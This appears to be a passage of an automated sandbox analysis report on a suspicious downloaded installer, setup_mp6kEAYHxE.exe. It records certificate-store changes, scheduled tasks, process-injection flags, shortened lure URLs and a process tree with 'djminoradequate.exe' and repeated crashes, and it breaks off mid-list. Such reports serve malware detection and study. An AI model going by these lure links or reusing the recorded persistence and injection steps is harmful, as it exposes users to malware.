| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1376880307-1734125928-2892936080-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS05233879\setup.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\setup_mp6kEAYHxE.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1IZk
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff81e303cb8,0x7ff81e303cc8,0x7ff81e303cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4492 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5724 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4768 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5456 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\setup_mp6kEAYHxE.exe
"C:\Users\Admin\Desktop\setup_mp6kEAYHxE.exe"
C:\Users\Admin\AppData\Local\Temp\is-54FQC.tmp\setup_mp6kEAYHxE.tmp
"C:\Users\Admin\AppData\Local\Temp\is-54FQC.tmp\setup_mp6kEAYHxE.tmp" /SL5="$702DE,6120275,56832,C:\Users\Admin\Desktop\setup_mp6kEAYHxE.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "dj_minor_adequate_7161"
C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe
"C:\Users\Admin\AppData\Local\DJ Minor Adequate\djminoradequate.exe" 12c7d44288663dab807bf8727c2b03b5
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 852
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 928
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1048
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1088
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1132
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1144
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1872
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 2052
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://clck.ru/3Bsi4L
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2768 -ip 2768
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff81e303cb8,0x7ff81e303cc8,0x7ff81e303cd8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1644
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,16021933063194253087,2559944181537848954,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2768 -ip 2768
C:\Windows\SysWOW64\WerFault.exe
